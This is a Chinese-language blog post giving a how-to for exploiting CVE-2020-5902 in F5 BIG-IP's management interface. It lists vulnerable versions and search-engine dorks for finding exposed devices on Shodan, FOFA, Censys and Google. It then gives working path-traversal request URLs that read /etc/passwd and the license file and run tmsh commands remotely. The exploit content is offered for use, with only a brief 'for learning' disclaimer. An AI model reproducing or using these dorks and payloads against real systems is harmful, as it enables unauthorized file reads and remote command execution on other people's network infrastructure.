• CVE-2020-5902 f5-big-ip Read File&RCE利用方式


    介绍:

    F5 BIG-IP 是美国F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。
    在 F5 BIG-IP 产品的流量管理用户页面 (TMUI)/配置实用程序的特定页面中存在一处远程代码执行漏洞。
    未授权的远程攻击者通过向该页面发送特制的请求包,可以造成任意Java 代码执行。进而控制 F5 BIG-IP 的全部功能,包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等。

    影响版本:

    BIG-IP 15.x: 15.1.0/15.0.0
    BIG-IP 14.x: 14.1.0 ~ 14.1.2
    BIG-IP 13.x: 13.1.0 ~ 13.1.3
    BIG-IP 12.x: 12.1.0 ~ 12.1.5
    BIG-IP 11.x: 11.6.1 ~ 11.6.5

    搜索语法:

    请遵守网络安全法,仅做学习交流使用,未授权入侵的、非法操作的与本人无关、与平台无关,不是去搞事情的!

    shodan
    http.favicon.hash:-335242539
    http.title:"BIG-IP®- Redirect"
    fofa
    title="BIG-IP®- Redirect"
    censys
    443.https.get.body_sha256:5d78eb6fa93b995f9a39f90b6fb32f016e80dbcda8eb71a17994678692585ee5
    443.https.get.title:"BIG-IP®- Redirect"
    google
    inurl:"tmui/login.jsp"
    intitle:"BIG-IP" inurl:"tmui"
    

    浏览器访问目标页面如下:

    可以使用的两种利用方法,Read File&RCE如下:

    Read File

    https://XXXXX/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
    

    https://XXXXX/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
    

    RCE

    https://XXXXX/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
    

    好好学习,天天向上。

  • 相关阅读:
    理解Java虚拟机——Java内存模型管理
    Java 使用fastjson 将 json字符串写到文件中去
    java 如何调用 linux or mac 命令行
    MacOS 编译 openjdk8 并导入 Clion 调试
    linux ls 命令超级详解
    小 Q 与树 (点分治)
    mysql 索引策略
    java中serialVersionUID作用
    通过源码分析Spring Security用户认证流程
    使用PowerMockRunner和Mockito编写单元测试用例详解
  • 原文地址:https://www.cnblogs.com/Yang34/p/13308626.html
Copyright © 2020-2023  润新知